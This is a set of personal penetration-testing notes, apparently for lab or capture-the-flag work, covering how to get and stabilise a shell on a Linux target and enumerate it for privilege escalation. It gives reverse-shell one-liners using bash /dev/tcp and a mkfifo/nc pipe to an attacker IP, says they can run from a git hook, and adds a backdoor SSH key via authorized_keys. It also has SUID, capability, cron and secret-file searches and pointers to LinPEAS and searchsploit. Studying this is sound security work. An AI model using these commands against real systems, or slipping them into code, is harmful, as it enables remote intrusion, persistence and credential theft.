Shell
Table of Contents
Disclaimer: These are my personal notes, published "as-is"
without warranty or guarantee of any kind. Use at your own risk. Licensed
CC BY-NC-SA 4.0.
Establish a shell #
Check payloads all the things for commands.
Shell commands #
Can run from a script e.g. a git hook. May need a shebang header e.g. #!/bin/sh
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f
Got a shell #
First commands to set up terminal #
python -c 'import pty; pty.spawn("/bin/bash")'
OR
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color`
alias ll='ls -lsaht --color=auto'
Ctrl + Z (make background process), then…
stty raw -echo ; fg ; reset
stty columns 200 rows 200
SSH session - authorized_keys #
mkdir -p .ssh
echo 'KEYHERE' | tee .ssh/authorized_keys
Check capabilities #
which gcc
which cc
which python
which perl
which wget
which curl
which nc
which ncat
Check arch #
file /bin/bash
uname -a
cat /etc/issue
cat /etc/*-release
User info #
sudo -l
ls -lsaht /etc/sudoers
groups <user>
env
cd /home
ls -lsaht
ls -lsaR /home/ # Looking for .ssh keys
Check web dir #
cd /var/www/html
ls -lsaht
SUID / GUID escalations #
Find SUID #
find / -perm -u=s -type f 2>/dev/null
Find GUID #
find / -perm -g=s -type f 2>/dev/null
Extended capabilities #
getcap, setcap and file capabilities — insecure.ws
getcap -r / 2>/dev/null
Commands with capabilities may be restricted by Apparmor. ls /etc/apparmor.d/
to check
process spying #
- Is there some script doing things that might be interesting?
- Shows what’s recently run.
- Keep it running to see if there are any periodic scripts.
https://github.com/DominicBreuker/pspy/blob/master/README.md
cd /var/tmp/
Transfer pspy
chmod 755 pspy
./pspy
Local network #
netstat -antup
netstat -tunlp
Root running anything? #
ps aux |grep -i 'root' --color=auto
Any interesting files? #
ls -lsaht /etc/
ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/
Anything other than root / shadow here?
cat /etc/fstab
Any config files left behind? #
ls -lsaht |grep -i ‘.conf’ --color=auto
ls -lsaht |grep -i ‘.secret’ --color=auto
Cron #
crontab –u root –l
cat /etc/crontab
ls /etc/cron.*
List all files #
Find all files created by a user:
find / -user miguel 2>/dev/null
Any mail? #
cd /var/mail/
ls -lsaht
Automated scripts #
- LinPEAS
- Traitor
searchsploit -m multiple/local/4713.sh
copies the specified exploit to the local directory.